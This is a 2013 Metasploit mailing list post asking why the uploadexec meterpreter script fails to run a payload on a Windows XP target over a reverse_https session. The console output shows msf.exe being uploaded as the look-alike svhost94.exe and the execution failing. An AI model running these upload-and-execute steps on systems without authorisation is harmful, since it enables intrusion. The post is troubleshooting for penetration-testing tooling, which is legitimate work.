Metasploit mailing list archives

Problems executing file on target using uploadexec

From: la zariguella <lazariguella () gmail com>
Date: Tue, 19 Feb 2013 22:04:10 -0300

Hi guys,

I'm having a little problem here using uploadexec meterpreter script.

Target => Windows XP SP3 Fully Patched running Java 1.7.0_13
Local box => Mac Osx 10.7.4
Ruby => 1.9.2p320
Metasploit  => metasploit v4.6.0-dev [core:4.6 api:1.0]
Payload => meterpreter reverse_https

Im trying to execute a file on target, using uploadexec meterpreter script,
and im getting the following error:

meterpreter > run uploadexec -e msf.exe
[*] Running Upload and Execute Meterpreter script....
[*]     Uploading msf.exe....
[*]     msf.exe uploaded!
[*]     Uploaded as C:\WINDOWS\TEMP\svhost94.exe
[*]     running command C:\WINDOWS\TEMP\svhost94.exe
[*] Error Running Command C:\WINDOWS\TEMP\svhost94.exe:
Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation
failed: The process cannot access the file because it is being used by
another process.
[-] Error in script: Rex::Post::Meterpreter::RequestError
stdapi_sys_process_execute: Operation failed: The process cannot access the
file because it is being used by another process.
meterpreter >

On the remote system i have admin privileges, and i can run the executable
file mannualy without any problem. I am seeing the error is:

*Error Running Command C:\WINDOWS\TEMP\svhost94.exe:
Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation
failed: The process cannot access the file because it is being used by
another process.*

But i cant find too much info about what can be happening.

Could you please help me with this issue?

.:ZmN:.